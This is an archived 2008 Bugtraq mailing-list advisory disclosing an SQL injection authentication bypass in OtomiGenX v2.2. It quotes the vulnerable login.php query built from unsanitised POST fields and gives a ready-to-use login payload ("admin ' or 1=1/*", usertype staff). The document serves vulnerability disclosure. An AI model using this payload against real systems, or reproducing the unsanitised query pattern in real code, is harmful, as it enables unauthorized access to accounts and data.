lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080601002908.25696.qmail@securityfocus.com>
Date: 1 Jun 2008 00:29:08 -0000
From: hadihadi_zedehal_2006@...oo.com
To: bugtraq@...urityfocus.com
Subject: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerability

 
 ######################################################################################
 #                                                                                    #
 #  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities ::::....  #           
 ######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir
--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) 
----------------
                                .::::admin Authentication bypass vuln::::.
//vuln code in login.php:
...
..
...
line 29:

$passwd = md5($_POST[userPassword]);  // md5 hash password

if($_POST[userType] != 'Staff')
{$sql	  = "SELECT userID, userName 
	     FROM user_account 
	     WHERE userAccount='$_POST[userAccount]' AND 
		     userPassword='$passwd' AND 
		     userType='$_POST[userType]' AND isApproved='1'";

}else
$sql	  = "SELECT staffID, staffName, staffGroupID 
	     FROM staff 
	     WHERE staffAccount='$_POST[userAccount]' AND 
		     staffPassword='$passwd'";
...


-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff
--------------



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ